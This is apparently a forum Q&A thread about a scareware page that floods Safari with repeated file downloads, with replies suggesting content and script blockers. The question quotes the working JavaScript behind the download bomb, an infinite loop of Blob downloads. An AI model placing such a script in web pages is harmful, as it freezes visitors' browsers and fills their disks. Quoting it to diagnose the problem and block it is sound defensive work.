Background
A new spam page has started to appear throughout many "questionable" sites (movie sites, etc.). This new spam page fits in to the category of fake scans, MacKeeper, "YOU HAVE A VIRUS", etc. category.
Problem
The problem with this new page is that instead of just having a popup, the page actually initiates a download of a random 2kb (not harmful just contains random text) files repeatedly every ~1ms. The download folder fills up before you can close the window and you are left deleting 1000+ files. Unlike, a similar problem in which a page spam brings up the print dialog, there is very little time to react.
Failed Troubleshooting Attempts
-
I tried locking the download folder. While it prevented the downloads from…well…downloading it, a dialog box (see image) comes up. Usually, I could just dismiss this dialog box, but since the download is attempted every ~1ms, I a new dialog pops up every time I try to dismiss, preventing me from closing the window.
-
Force quitting Safari, which stops the download (after 1k's downloads) but then I loose all my other windows
-
Changing settings to ‘Ask for each download’ in Safari preferences. Doesn't work because 1k's of separate dialog boxes open prevent me from even closing the tab. Eventually crashing Safari.
Question
How can I prevent spam downloads in Safari?
UPDATE:
Heres the code causing the download (got it by disabling JavaScript and looking through code manually):
function download(g, h, j) {
var k = new Blob([g], {
type: j
});
if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
else {
var l = document.createElement("a"),
m = URL.createObjectURL(k);
l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
}
}
function bomb_ch() {
var g = Math.random().toString(36).substring(20),
h = Math.floor(50 * Math.random() + 25);
while (true) download(h, g, g)
}
function ch_jam() {
bomb_ch()
}
Note: I had some issues running the JS on a custom page. It froze instead of downloaded. I was able to emulate the download by using a setInterval() function calling a the download function.
Best Answer
Wouldn't this be a good case for a Safari content blocker / javascript blocker that's selective?
Ghostery might be a good place to start on the Mac to see if you can use pre-built rules to quash cross-site scripting / ad injection of code into web pages. Of course, if the page is serving up that content directly you'll need to disable javascript on that page entirely or take note and just block those sites that crap up your experience intentionally or due to selling off ad injection to anyone with the means to afford this scare ware and scam ware.
If you wanted to be more precise - GreaseMonkey type user scrips could combat this with enough JS knowledge on your part (or finding someone that wrote the script to block today's iteration of this malware).
Newer OS versions of Safari might help cut this down a bit, but there's money to be made by people that deliver this load of crap to your Mac so they'll likely adapt to any technologies that try to make it easy to block. Unless you're willing to spend more money supporting a business that maintains a library of settings that can "whack-a-mole" and adapt faster than the charlatans can cook up new code in their boiler room.
You'll also have to decide if the web sites that do this are also charlatans that are part of the con since they should know this is happening to you, one of the visitors they host.